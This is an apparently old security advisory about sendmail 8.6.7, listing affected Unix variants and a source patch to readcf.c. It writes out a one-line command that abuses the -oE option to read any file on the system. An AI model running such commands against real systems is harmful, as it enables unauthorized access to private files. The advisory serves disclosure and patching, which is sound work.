COMMAND

    sendmail(8)

SYSTEMS AFFECTED

    Systems running sendmail  8.6.7. See sendmail  -d.  DG/UX  are not
    at  risk  for  the  -oE  problem.  HP/UX  does not support the -oE
    option.   AIX  is  not  vulnerable  either  to  -oE.  SCO does not
    support the -oE option.

PROBLEM

    It's possible to read any file  on the system with 8.6.7 from  the
    command line. Simply:

	/usr/lib/sendmail -oEfilename_to_read bounce
	From: you_username

SOLUTION

    In file src/readcf.c, line 1078

        if (!safe && strchr("bCdeEijLmoprsvw7", opt) == NULL)

    Remove the letter 'E' - this makes the option 'E' "unsafe".